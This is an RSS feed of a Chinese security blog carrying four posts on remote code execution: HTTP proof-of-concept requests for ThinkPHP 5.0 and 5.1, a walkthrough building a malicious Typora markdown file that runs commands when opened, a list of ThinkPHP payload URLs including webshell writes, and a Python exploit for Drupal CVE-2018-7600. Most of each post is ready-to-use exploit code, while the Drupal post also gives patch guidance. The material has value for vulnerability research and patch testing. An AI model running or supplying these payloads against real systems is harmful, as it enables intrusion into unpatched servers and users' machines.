<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>远程命令执行 &#8211; ChaBug安全</title>
	<atom:link href="/tags/%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C/feed" rel="self" type="application/rss+xml" />
	<link>/</link>
	<description>一个分享知识、结识伙伴、资源共享的博客</description>
	<lastBuildDate>Fri, 23 Aug 2019 01:19:28 +0000</lastBuildDate>
	<language>zh-CN</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=5.5.5</generator>
	<item>
		<title>Thinkphp5.x又双叒叕一个远程代码执行</title>
		<link>/web/638.html</link>
		
		<dc:creator><![CDATA[Y4er]]></dc:creator>
		<pubDate>Fri, 11 Jan 2019 12:44:24 +0000</pubDate>
				<category><![CDATA[渗透测试]]></category>
		<category><![CDATA[thinkphp]]></category>
		<category><![CDATA[远程命令执行]]></category>
		<guid isPermaLink="false">/?p=638</guid>

					<description><![CDATA[今天thinkphp官方又双叒叕发布了5.0.24版本，包含了一个可能getshell的安全更新。在12月9日thinkphp爆出远程代码执行之后，今天晚上又爆出来远程代码执行，见...]]></description>
										<content:encoded><![CDATA[<p class="md-end-block" contenteditable="true">今天<span class="wpcom_tag_link"><a href="/tags/thinkphp" title="thinkphp" target="_blank">thinkphp</a></span>官方又双叒叕发布了5.0.24版本，包含了一个可能getshell的安全更新。在12月9日thinkphp爆出远程代码执行之后，今天晚上又爆出来远程代码执行，见<span class=" md-link"><a spellcheck="false" href="https://blog.thinkphp.cn/910675">官方公告</a></span><span class="">。</span></p>
<h3 class="md-end-block md-heading" contenteditable="true">影响范围</h3>
<p class="md-end-block" contenteditable="true">thinkphp5.0.0~5.0.23</p>
<h3 class="md-end-block md-heading" contenteditable="true">各版本PoC</h3>
<p class="md-end-block" contenteditable="true">thinkphp5.0.10版本poc如图</p>
<p><span class="md-image md-img-loaded" contenteditable="false" data-src="https://ws1.sinaimg.cn/large/006xriynly1fz2vmzjmtvj30z40rktd9.jpg"><img src="https://ws1.sinaimg.cn/large/006xriynly1fz2vmzjmtvj30z40rktd9.jpg" /></span></p>
<pre class="lang:default decode:true ">POST /think-5.0.10/public/index.php?s=index/index/index HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 53
​
s=whoami&amp;_method=__construct&amp;method=&amp;filter[]=system</pre>
<p>&nbsp;</p>
<p class="md-end-block" contenteditable="true">在官网最新下载的5.0.23完整版中，在App类（thinkphp/library/think/App.php）中module方法增加了设置filter参数值的代码，用于初始化filter。因此通过上述请求设置的filter参数值会被重新覆盖为空导致无法利用。</p>
<p>thinkphp5.0.23版本<span class=""><strong>需要开启debug模式</strong></span>才可以利用，附两个poc： <span class="md-image md-img-loaded" contenteditable="false" data-src="https://ws1.sinaimg.cn/large/006xriynly1fz2vpbwanaj30z40rk799.jpg"><img src="https://ws1.sinaimg.cn/large/006xriynly1fz2vpbwanaj30z40rk799.jpg" /></span></p>
<pre class="lang:default decode:true ">POST /thinkphp/public/index.php HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 65
​
_method=__construct&amp;filter[]=system&amp;server[REQUEST_METHOD]=whoami</pre>
<p>&nbsp;</p>
<div class="md-hr md-end-block" tabindex="-1" contenteditable="false">
<hr />
</div>
<p class="md-end-block md-focus" contenteditable="true"><span class="md-image md-img-loaded md-expand" contenteditable="false" data-src="https://ws1.sinaimg.cn/large/006xriynly1fz2vv99temj30z40rkwik.jpg"><img class="" src="https://ws1.sinaimg.cn/large/006xriynly1fz2vv99temj30z40rkwik.jpg" /></span></p>
<pre class="lang:default decode:true ">POST /thinkphp/public/index.php?s=captcha HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 77
​
_method=__construct&amp;filter[]=system&amp;method=post&amp;server[REQUEST_METHOD]=whoami</pre>
<p>&nbsp;</p>
<p>上一个rec参考链接</p>
<blockquote class="wp-embedded-content" data-secret="uQx7gAthaX"><p><a href="/web/613.html">thinkphp5框架缺陷导致远程代码执行</a></p></blockquote>
<p><iframe title="《thinkphp5框架缺陷导致远程代码执行》—ChaBug安全" class="wp-embedded-content" sandbox="allow-scripts" security="restricted" style="position: absolute; clip: rect(1px, 1px, 1px, 1px);" src="/web/613.html/embed#?secret=uQx7gAthaX" data-secret="uQx7gAthaX" width="500" height="282" frameborder="0" marginwidth="0" marginheight="0" scrolling="no"></iframe></p>
<p><a href="https://y4er.com/post/thinkphp5.x-rce-18-12-9/">https://y4er.com/post/thinkphp5.x-rce-18-12-9/</a></p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Typora Remote Command Execution</title>
		<link>/web/627.html</link>
		
		<dc:creator><![CDATA[Y4er]]></dc:creator>
		<pubDate>Thu, 20 Dec 2018 02:59:49 +0000</pubDate>
				<category><![CDATA[渗透测试]]></category>
		<category><![CDATA[exec]]></category>
		<category><![CDATA[typora]]></category>
		<category><![CDATA[远程命令执行]]></category>
		<guid isPermaLink="false">/?p=627</guid>

					<description><![CDATA[前言 Typora是一个颜值和实力并存的markdown编辑器，我也在用。Typora基于Electron框架进行开发，今天看到了就复现下这个漏洞。 漏洞分析 在基于Electro...]]></description>
										<content:encoded><![CDATA[<h2 class="md-end-block md-heading" contenteditable="true">前言</h2>
<p class="md-end-block" contenteditable="true">Typora是一个颜值和实力并存的markdown编辑器，我也在用。Typora基于Electron框架进行开发，今天看到了就复现下这个漏洞。</p>
<h2 class="md-end-block md-heading" contenteditable="true">漏洞分析</h2>
<p class="md-end-block" contenteditable="true">在基于Electron框架开发的应用中，如果说找到了XSS漏洞，那么基本上也完成了命令执行。那么我们进行XSS盲打之后并没有收获，原因是因为Typora的作者在开发的过程中用到了<span spellcheck="false"><a href="https://github.com/cure53/DOMPurify">https://github.com/cure53/DOMPurify</a></span>，缓解了大部分的XSS攻击。</p>
<p class="md-end-block" contenteditable="true">然鹅，<span spellcheck="false"><code>iframe</code></span>是一个神奇的标签，我们先来尝试下</p>
<pre spellcheck="false" class="md-fences md-end-block ty-contain-cm modeLoaded" lang="html" contenteditable="true" cid="n8" mdtype="fences"><span role="presentation"><span class="cm-tag cm-bracket">&lt;</span><span class="cm-tag">iframe</span> <span class="cm-attribute">src</span>=<span class="cm-string">"javascript:alert(1)"</span><span class="cm-tag cm-bracket">&gt;&lt;/</span><span class="cm-tag">iframe</span><span class="cm-tag cm-bracket">&gt;</span></span></pre>
<p class="md-end-block" contenteditable="true"><span class="md-image md-img-loaded" contenteditable="false" data-src="https://ws1.sinaimg.cn/large/006xriynly1fycz8zbd2jj30c604p0sn.jpg"><img src="https://ws1.sinaimg.cn/large/006xriynly1fycz8zbd2jj30c604p0sn.jpg" /></span></p>
<p class="md-end-block" contenteditable="true">我们来看下输出的结果</p>
<p class="md-end-block" contenteditable="true"><span class="md-image md-img-loaded" contenteditable="false" data-src="https://ws1.sinaimg.cn/large/006xriynly1fycz8f1f1vj30mb059747.jpg"><img src="https://ws1.sinaimg.cn/large/006xriynly1fycz8f1f1vj30mb059747.jpg" /></span></p>
<p class="md-end-block" contenteditable="true">可以看到，<span class="wpcom_tag_link"><a href="/tags/typora" title="typora" target="_blank">typora</a></span>把iframe这个标签的src属性会当作相对路径进行处理，那么我们来包含下本地文件试试</p>
<p class="md-end-block" contenteditable="true">新建poc.md输入</p>
<pre spellcheck="false" class="md-fences md-end-block ty-contain-cm modeLoaded" lang="html" contenteditable="true" cid="n14" mdtype="fences"><span role="presentation"><span class="cm-tag cm-bracket">&lt;</span><span class="cm-tag">iframe</span> <span class="cm-attribute">src</span>=<span class="cm-string">"./poc.html"</span><span class="cm-tag cm-bracket">&gt;&lt;/</span><span class="cm-tag">iframe</span><span class="cm-tag cm-bracket">&gt;</span></span></pre>
<p class="md-end-block" contenteditable="true">同目录下的poc.html内容如下：</p>
<pre spellcheck="false" class="md-fences md-end-block ty-contain-cm modeLoaded" lang="javascript" contenteditable="true" cid="n16" mdtype="fences"><span role="presentation"><span class="cm-operator">&lt;</span><span class="cm-variable">script</span><span class="cm-operator">&gt;</span></span>
<span role="presentation">        <span class="cm-variable">window</span>.<span class="cm-property">parent</span>.<span class="cm-property">top</span>.<span class="cm-property">alert</span>(<span class="cm-number">1</span>)</span>
<span role="presentation"><span class="cm-operator">&lt;</span><span class="cm-string-2">/script&gt;</span></span></pre>
<p class="md-end-block" contenteditable="true">弹窗！</p>
<p class="md-end-block" contenteditable="true"><span class="md-image md-img-loaded" contenteditable="false" data-src="https://ws1.sinaimg.cn/large/006xriynly1fyd02op1e7j31hc0smjrp.jpg"><img src="https://ws1.sinaimg.cn/large/006xriynly1fyd02op1e7j31hc0smjrp.jpg" /></span></p>
<p class="md-end-block" contenteditable="true">那么为什么弹窗呢？打开Devtools看下</p>
<p class="md-end-block" contenteditable="true">Typora将我们的iframe标签解析成如下代码，其中<span spellcheck="false"><code>sendbox</code></span>是我们要注意的</p>
<pre spellcheck="false" class="md-fences md-end-block ty-contain-cm modeLoaded" lang="html" contenteditable="true" cid="n21" mdtype="fences"><span role="presentation"><span class="cm-tag cm-bracket">&lt;</span><span class="cm-tag">iframe</span> <span class="cm-attribute">src</span>=<span class="cm-string">"C:\Users\Y4er\Desktop\poc.html"</span> <span class="cm-attribute">allow-top-navigation</span>=<span class="cm-string">"false"</span> <span class="cm-attribute">allow-forms</span>=<span class="cm-string">"false"</span> <span class="cm-attribute">allowfullscreen</span>=<span class="cm-string">"true"</span> <span class="cm-attribute">allow-popups</span>=<span class="cm-string">"false"</span> <span class="cm-attribute">sandbox</span>=<span class="cm-string">"allow-same-origin allow-scripts"</span> <span class="cm-attribute">onload</span>=<span class="cm-string">"window.remoteOnLoad(this)"</span> <span class="cm-attribute">height</span>=<span class="cm-string">"0"</span> <span class="cm-attribute">data-user-height</span>=<span class="cm-string">"0"</span><span class="cm-tag cm-bracket">&gt;&lt;/</span><span class="cm-tag">iframe</span><span class="cm-tag cm-bracket">&gt;</span></span></pre>
<p class="md-end-block" contenteditable="true">我们看下<span class=""><a spellcheck="false" href="https://html.spec.whatwg.org/multipage/iframe-embed-object.html#attr-iframe-sandbox">HTML的文档</a></span>中关于sendbox的说明，在html5中通过sendbox来提高iframe的安全性，而文档中也提到了</p>
<p class="md-end-block" contenteditable="true"><span class="md-image md-img-loaded" contenteditable="false" data-src="https://ws1.sinaimg.cn/large/006xriynly1fyd06uqg7dj318d03gjry.jpg"><img src="https://ws1.sinaimg.cn/large/006xriynly1fyd06uqg7dj318d03gjry.jpg" /></span></p>
<p class="md-end-block" contenteditable="true">如果<span spellcheck="false"><code>allow-scripts</code></span>和<span spellcheck="false"><code>allow-same-origin</code></span>同时被设置为sendbox的属性时，那么sendbox则形同虚设</p>
<p class="md-end-block" contenteditable="true">那么我们修改下我们的poc来进行命令执行</p>
<pre spellcheck="false" class="md-fences md-end-block ty-contain-cm modeLoaded" lang="html" contenteditable="true" cid="n26" mdtype="fences"><span role="presentation"><span class="cm-tag cm-bracket">&lt;</span><span class="cm-tag">script</span><span class="cm-tag cm-bracket">&gt;</span></span>
<span role="presentation">      <span class="cm-comment">//rce</span></span>
<span role="presentation">        <span class="cm-variable">window</span>.<span class="cm-property">parent</span>.<span class="cm-property">top</span>.<span class="cm-property">require</span>(<span class="cm-string">'child_process'</span>).<span class="cm-property">execFile</span>(<span class="cm-string">'C:/Windows/System32/calc.exe'</span>,<span class="cm-keyword">function</span>(<span class="cm-def">error</span>, <span class="cm-def">stdout</span>, <span class="cm-def">stderr</span>){</span>
<span role="presentation">        <span class="cm-keyword">if</span>(<span class="cm-variable-2">error</span>){</span>
<span role="presentation">            <span class="cm-variable">console</span>.<span class="cm-property">log</span>(<span class="cm-variable-2">error</span>);</span>
<span role="presentation">        }  </span>
<span role="presentation">        });</span>
<span role="presentation"><span class="cm-tag cm-bracket">&lt;/</span><span class="cm-tag">script</span><span class="cm-tag cm-bracket">&gt;</span></span></pre>
<p class="md-end-block" contenteditable="true"><span class="md-image md-img-loaded" contenteditable="false" data-src="https://ws1.sinaimg.cn/large/006xriynly1fyd09dlmmwj31hc0smq6w.jpg"><img src="https://ws1.sinaimg.cn/large/006xriynly1fyd09dlmmwj31hc0smq6w.jpg" /></span></p>
<p class="md-end-block" contenteditable="true">我们捋一下思路，现在我们通过iframe的src属性引用同目录的poc.html文档，来执行命令。可是这就需要两个文件，一个poc.md，一个poc.html。繁琐，有没有办法做到一个文件就达到我们的命令执行的目的的？</p>
<p class="md-end-block" contenteditable="true"><span class=""><strong>尝试srcdoc</strong></span></p>
<pre spellcheck="false" class="md-fences md-end-block ty-contain-cm modeLoaded" lang="html" contenteditable="true" cid="n30" mdtype="fences"><span role="presentation"><span class="cm-tag cm-bracket">&lt;</span><span class="cm-tag">iframe</span> <span class="cm-attribute">srcdoc</span>=<span class="cm-string">"&lt;script&gt;window.parent.top.alert(1)&lt;/script&gt;"</span><span class="cm-tag cm-bracket">&gt;&lt;/</span><span class="cm-tag">iframe</span><span class="cm-tag cm-bracket">&gt;</span></span></pre>
<p class="md-end-block" contenteditable="true">并没有效果，在Devtools中我们看到sendbox的属性被设置为空，那么这是默认应用所有的沙盒限制，srcdoc不可行</p>
<p class="md-end-block" contenteditable="true"><span class=""><strong>尝试引入md文件</strong></span></p>
<p class="md-end-block" contenteditable="true">poc.md</p>
<pre spellcheck="false" class="md-fences md-end-block ty-contain-cm modeLoaded" lang="markdown" contenteditable="true" cid="n34" mdtype="fences"><span role="presentation"><span class="cm-tag cm-bracket">&lt;</span><span class="cm-tag">iframe</span> <span class="cm-attribute">src</span>=<span class="cm-string">"./poc.md"</span><span class="cm-tag cm-bracket">&gt;&lt;/</span><span class="cm-tag">iframe</span><span class="cm-tag cm-bracket">&gt;</span></span></pre>
<p class="md-end-block" contenteditable="true">cmd.md</p>
<pre spellcheck="false" class="md-fences md-end-block ty-contain-cm modeLoaded" lang="html" contenteditable="true" cid="n36" mdtype="fences"><span role="presentation"><span class="cm-tag cm-bracket">&lt;</span><span class="cm-tag">script</span><span class="cm-tag cm-bracket">&gt;</span></span>
<span role="presentation">      <span class="cm-comment">//rce</span></span>
<span role="presentation">        <span class="cm-variable">window</span>.<span class="cm-property">parent</span>.<span class="cm-property">top</span>.<span class="cm-property">require</span>(<span class="cm-string">'child_process'</span>).<span class="cm-property">execFile</span>(<span class="cm-string">'C:/Windows/System32/calc.exe'</span>,<span class="cm-keyword">function</span>(<span class="cm-def">error</span>, <span class="cm-def">stdout</span>, <span class="cm-def">stderr</span>){</span>
<span role="presentation">        <span class="cm-keyword">if</span>(<span class="cm-variable-2">error</span>){</span>
<span role="presentation">            <span class="cm-variable">console</span>.<span class="cm-property">log</span>(<span class="cm-variable-2">error</span>);</span>
<span role="presentation">        }  </span>
<span role="presentation">        });</span>
<span role="presentation"><span class="cm-tag cm-bracket">&lt;/</span><span class="cm-tag">script</span><span class="cm-tag cm-bracket">&gt;</span></span></pre>
<p class="md-end-block" contenteditable="true">计算器被弹了出来</p>
<p class="md-end-block" contenteditable="true"><span class="md-image md-img-loaded" contenteditable="false" data-src="https://ws1.sinaimg.cn/large/006xriynly1fyd0gkthm5j31hc0smtco.jpg"><img src="https://ws1.sinaimg.cn/large/006xriynly1fyd0gkthm5j31hc0smtco.jpg" /></span></p>
<p class="md-end-block" contenteditable="true">也就是说我们现在能够引入md文件，这样的话我们代码执行的命令就可以直接放到poc.md中，然后自己iframe自己就可以达到命令执行的效果了。</p>
<p class="md-end-block" contenteditable="true"><span class=""><strong>引用自己</strong></span></p>
<p class="md-end-block" contenteditable="true">构造poc.md</p>
<pre spellcheck="false" class="md-fences md-end-block ty-contain-cm modeLoaded" lang="html" contenteditable="true" cid="n42" mdtype="fences"><span role="presentation"><span class="cm-tag cm-bracket">&lt;</span><span class="cm-tag">iframe</span> <span class="cm-attribute">src</span>=<span class="cm-string">"./poc.md"</span><span class="cm-tag cm-bracket">&gt;&lt;/</span><span class="cm-tag">iframe</span><span class="cm-tag cm-bracket">&gt;</span></span>
<span role="presentation"><span class="cm-tag cm-bracket">&lt;</span><span class="cm-tag">script</span><span class="cm-tag cm-bracket">&gt;</span></span>
<span role="presentation">      <span class="cm-comment">//rce</span></span>
<span role="presentation">        <span class="cm-variable">window</span>.<span class="cm-property">parent</span>.<span class="cm-property">top</span>.<span class="cm-property">require</span>(<span class="cm-string">'child_process'</span>).<span class="cm-property">execFile</span>(<span class="cm-string">'C:/Windows/System32/calc.exe'</span>,<span class="cm-keyword">function</span>(<span class="cm-def">error</span>, <span class="cm-def">stdout</span>, <span class="cm-def">stderr</span>){</span>
<span role="presentation">        <span class="cm-keyword">if</span>(<span class="cm-variable-2">error</span>){</span>
<span role="presentation">            <span class="cm-variable">console</span>.<span class="cm-property">log</span>(<span class="cm-variable-2">error</span>);</span>
<span role="presentation">        }  </span>
<span role="presentation">        });</span>
<span role="presentation"><span class="cm-tag cm-bracket">&lt;/</span><span class="cm-tag">script</span><span class="cm-tag cm-bracket">&gt;</span></span></pre>
<p class="md-end-block" contenteditable="true"><span class="md-image md-img-loaded" contenteditable="false" data-src="https://ws1.sinaimg.cn/large/006xriynly1fyd0k6m6taj31hc0smtdd.jpg"><img src="https://ws1.sinaimg.cn/large/006xriynly1fyd0k6m6taj31hc0smtdd.jpg" /></span></p>
<p class="md-end-block" contenteditable="true">现在我们把poc.md文件发给别人，只要他用typora打开，就会执行我们代码中的命令。</p>
<h2 class="md-end-block md-heading" contenteditable="true">后记</h2>
<p class="md-end-block" contenteditable="true">这篇文章是我昨天晚上看到的，今天复现的时候发现点问题，列举下：</p>
<ol class="ol-list" start="">
<li class="md-list-item">
<p class="md-end-block" contenteditable="true">平台限制 基于Electron框架开发只是在win上，mac和Linux就另当别论</p>
</li>
<li class="md-list-item">
<p class="md-end-block" contenteditable="true">版本限制 我用0.9.60beta版本不能执行，看了Typora的<span class=""><a spellcheck="false" href="https://typora.io/windows/dev_release.html">版本日志</a></span>后发现在0.9.9.56 (beta)版本中才支持<span spellcheck="false"><code>video</code></span>, <span spellcheck="false"><code>iframe</code></span>, <span spellcheck="false"><code>kbd</code></span>, <span spellcheck="false"><code>details</code></span>, <span spellcheck="false"><code>ruby</code></span>这类标签，漏洞也产生在这个版本，而在0.9.9.57 (beta)版本中就对此漏洞进行了修复，限制太大</p>
</li>
</ol>
<p class="md-end-block md-focus" contenteditable="true">参考原文链接：<span class="md-expand" spellcheck="false"><a href="https://zhuanlan.zhihu.com/p/51768716">https://zhuanlan.zhihu.com/p/51768716</a></span></p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>thinkphp5框架缺陷导致远程代码执行</title>
		<link>/web/613.html</link>
		
		<dc:creator><![CDATA[Y4er]]></dc:creator>
		<pubDate>Tue, 11 Dec 2018 11:45:30 +0000</pubDate>
				<category><![CDATA[渗透测试]]></category>
		<category><![CDATA[PHP]]></category>
		<category><![CDATA[thinkphp]]></category>
		<category><![CDATA[代码审计]]></category>
		<category><![CDATA[远程命令执行]]></category>
		<guid isPermaLink="false">/?p=613</guid>

					<description><![CDATA[&#160; /tp-5.1.24/public/index.php?s=index/\think\template\driver\file/write?cacheFile=she...]]></description>
										<content:encoded><![CDATA[<p><img loading="lazy" class="alignnone size-medium" src="https://ws1.sinaimg.cn/large/006xriynly1fy31j8s2yhj30oc0ouqk2.jpg" width="876" height="894" /></p>
<p>&nbsp;</p>
<pre class="lang:default decode:true ">/tp-5.1.24/public/index.php?s=index/\think\template\driver\file/write?cacheFile=shell.php&amp;content=%3C?php%20phpinfo();?%3E
</pre>
<pre class="lang:default decode:true ">1、?s=index/\think\Request/input&amp;filter=phpinfo&amp;data=1
2、?s=index/\think\Request/input&amp;filter=system&amp;data=id
3、?s=index/\think\template\driver\file/write&amp;cacheFile=shell.php&amp;content=%3C?php%20phpinfo();?%3E
4、?s=index/\think\view\driver\Php/display&amp;content=%3C?php%20phpinfo();?%3E
5、?s=index/\think\app/invokefunction&amp;function=call_user_func_array&amp;vars[0]=phpinfo&amp;vars[1][]=1
6、?s=index/\think\app/invokefunction&amp;function=call_user_func_array&amp;vars[0]=system&amp;vars[1][]=id
7、?s=index/\think\Container/invokefunction&amp;function=call_user_func_array&amp;vars[0]=phpinfo&amp;vars[1][]=1
8、?s=index/\think\Container/invokefunction&amp;function=call_user_func_array&amp;vars[0]=system&amp;vars[1][]=id
</pre>
<p><img loading="lazy" class="alignnone size-medium" src="https://ws1.sinaimg.cn/large/006xriynly1fy31lby3b1j31ew0h3t90.jpg" width="1832" height="615" /></p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>CVE-2018-7600 Drupal 远程命令执行漏洞EXP</title>
		<link>/web/399.html</link>
		
		<dc:creator><![CDATA[Y4er]]></dc:creator>
		<pubDate>Sat, 14 Apr 2018 15:19:00 +0000</pubDate>
				<category><![CDATA[渗透测试]]></category>
		<category><![CDATA[cve]]></category>
		<category><![CDATA[Drupal]]></category>
		<category><![CDATA[exp]]></category>
		<category><![CDATA[收集]]></category>
		<category><![CDATA[漏洞]]></category>
		<category><![CDATA[远程命令执行]]></category>
		<guid isPermaLink="false">/?p=328</guid>

					<description><![CDATA[CVE-2018-7600 Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8...]]></description>
										<content:encoded><![CDATA[<p>CVE-2018-7600</p>
<blockquote><p><span class="wpcom_tag_link"><a href="/tags/drupal" title="Drupal" target="_blank">Drupal</a></span> before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code .</p></blockquote>
<h3>影响版本</h3>
<ol>
<li>Drupal 6</li>
<li>Drupal 7</li>
<li>Drupal 8</li>
</ol>
<h3>修复建议</h3>
<p>Drupal 6.x的修复参考以下网站：</p>
<p><a href="https://www.drupal.org/project/d6lts">https://www.drupal.org/project/d6lts</a></p>
<p>Drupal 7.x请升级到Drupal 7.5.8版本，</p>
<p>同时官方给出7.X补丁，若用户无法立即升级版本，请更新补丁，补丁地址为：</p>
<p><a href="https://cgit.drupalcode.org/drupal/rawdiff/?h=7.x&#038;id=2266d2a83db50e2f97682d9a0fb8a18e2722cba5">https://cgit.drupalcode.org/drupal/rawdiff/?h=7.x&#038;id=2266d2a83db50e2f97682d9a0fb8a18e2722cba5</a></p>
<p>Drupal 8.5.x请升级到Drupal 8.5.1版本</p>
<p>同时官方给出8.5.X补丁，若用户无法立即升级版本，请更新补丁，补丁地址为：</p>
<p><a href="https://cgit.drupalcode.org/drupal/rawdiff/?h=8.5.x&#038;id=5ac8738fa69df34a0635f0907d661b509ff9a28f">https://cgit.drupalcode.org/drupal/rawdiff/?h=8.5.x&#038;id=5ac8738fa69df34a0635f0907d661b509ff9a28f</a></p>
<p>Drupal 8.3.x和8.4.x版本官方已不进行维护，但此<span class="wpcom_tag_link"><a href="/tags/%e6%bc%8f%e6%b4%9e" title="漏洞" target="_blank">漏洞</a></span>非常严重，官方此次也给出了对应补丁，补丁同8.5.x版本：补丁地址为：</p>
<p><a href="https://cgit.drupalcode.org/drupal/rawdiff/?h=8.5.x&#038;id=5ac8738fa69df34a0635f0907d661b509ff9a28f">https://cgit.drupalcode.org/drupal/rawdiff/?h=8.5.x&#038;id=5ac8738fa69df34a0635f0907d661b509ff9a28f</a></p>
<p>由于Drupal 8.3.x和8.4.x版本官方已不进行维护，建议用户最好升级到官方维护的Drupal 8.3.9以及Drupal 8.4.6版本</p>
<h3>友情提示</h3>
<p>Drupal 8.0.x、Drupal 8.1.x、Drupal 8.2.x官方已不再维护，请各位用户升级到官方维护的版本</p>
<h3>EXP</h3>
<pre><code>#!/usr/bin/env
import sys
import requests
print ('################################################################')
print ('# Proof-Of-Concept for CVE-2018-7600')
print ('# by Vitalii Rudnykh')
print ('# Thanks by AlbinoDrought, RicterZ, FindYanot, CostelSalanders')
print ('# https://github.com/a2u/CVE-2018-7600')
print ('################################################################')
print ('Provided only for educational or information purposes\n')
target = input('Enter target url (example: https://domain.ltd/): ')
url = target + 'user/register?element_parents=account/mail/%23value&amp;ajax_form=1&amp;_wrapper_format=drupal_ajax'
payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': 'echo &quot;;-)&quot; | tee hello.txt'}
r = requests.post(url, data=payload)
if r.status_code != 200:
  sys.exit(&quot;Not exploitable&quot;)
print ('\nCheck: '+target+'hello.txt')</code></pre>
]]></content:encoded>
					
		
		
			</item>
	</channel>
</rss>
